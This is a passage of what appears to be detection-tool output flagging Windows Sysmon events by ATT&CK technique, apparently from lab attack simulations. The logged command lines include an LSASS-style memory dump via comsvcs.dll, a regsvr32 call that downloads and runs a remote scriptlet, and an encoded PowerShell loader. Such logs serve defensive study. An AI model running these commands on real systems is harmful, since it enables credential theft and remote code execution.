Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 5227 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-PIU87N6 + + + + + + 2020-09-28 12:47:36.204 + BC47D85C-DB68-5F71-0000-0010B237AB01 + 3352 + C:\Windows\System32\rdrleakdiag.exe + BC47D85C-FAA9-5F68-0000-0010D9590000 + 668 + C:\Windows\System32\lsass.exe + 3468 + 0x00007FF8C72C5EC0 + C:\WINDOWS\SYSTEM32\ntdll.dll + + +",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5883 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.150 + 365ABB72-3D6D-5CEB-0000-00101760FF00 + 2104 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 24 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 17:00:09.677 + 365ABB72-AD19-5CB8-0000-0010F4F40C00 + 3980 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 24 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 17:00:09.677 + 365ABB72-AD19-5CB8-0000-0010F4F40C00 + 3980 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5275 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:18:09.593 + 365ABB72-AB81-5C8E-0000-00102E9E0C00 + 3892 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding + C:\Windows\system32\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-173D-5C8F-0000-00102A6A0000 + 608 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5880 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.070 + 365ABB72-3D6D-5CEB-0000-0010575CFF00 + 2644 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppools /text:name + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 23 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:14.781 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17286 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 